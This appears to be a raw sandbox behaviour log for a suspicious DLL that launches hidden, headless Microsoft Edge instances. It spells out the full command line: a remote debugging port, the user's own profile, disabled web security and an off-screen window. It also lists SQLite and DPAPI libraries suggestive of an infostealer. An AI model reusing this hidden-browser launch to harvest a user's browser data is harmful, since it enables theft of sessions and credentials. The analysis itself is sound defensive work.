        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9526 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9949 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1468,i,9150515577941078100,10285627021896123688,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1596 --field-trial-handle=1468,i,8283710897970219115,15923041528330294747,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1532 --field-trial-handle=1520,i,669827839164534897,9964202643193972366,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1608 --field-trial-handle=1484,i,2587286534842799086,6337891116832541392,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1624 --field-trial-handle=1556,i,748892074680113926,7417843126809738630,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
        Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\loaddll64.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\loaddll64.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\loaddll64.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\loaddll64.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: mP8rzGD7fG.dllStatic PE information: Image base 0x180000000 > 0x60000000
        Source: mP8rzGD7fG.dllStatic file information: File size 26218512 > 1048576
        Source: mP8rzGD7fG.dllStatic PE information: Raw size of .managed is bigger than: 0x100000 < 0x82a200
        Source: mP8rzGD7fG.dllStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xf96800
        Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: mP8rzGD7fG.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Source: mP8rzGD7fG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: System.Diagnostics.Process.ni.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: rundll32.exe, 00000003.00000002.3112030805.00007FFE11744000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: System.IO.Compression.ni.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: rundll32.exe, 00000003.00000002.3110492735.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3539952749.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.2176549929.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.2576355085.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.2120039439.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmp
        Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: mP8rzGD7fG.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: mP8rzGD7fG.dllStatic PE information: section name: .managed
        Source: mP8rzGD7fG.dllStatic PE information: section name: hydrated
        Source: e_sqlite3.dll.14.drStatic PE information: section name: _RDATA
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF1FCC82 push rbx; retn 000Ah14_2_00007FFDFF1FCC89
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\e_sqlite3.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\System32\e_sqlite3.dllJump to dropped file
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeAPI coverage: 9.0 %
        Source: C:\Windows\System32\loaddll64.exe TID: 7504Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFF27BE70 GetSystemInfo,14_2_00007FFDFF27BE70
        Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
        Source: rundll32.exe, 00000003.00000002.3108264897.0000021BDB4DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
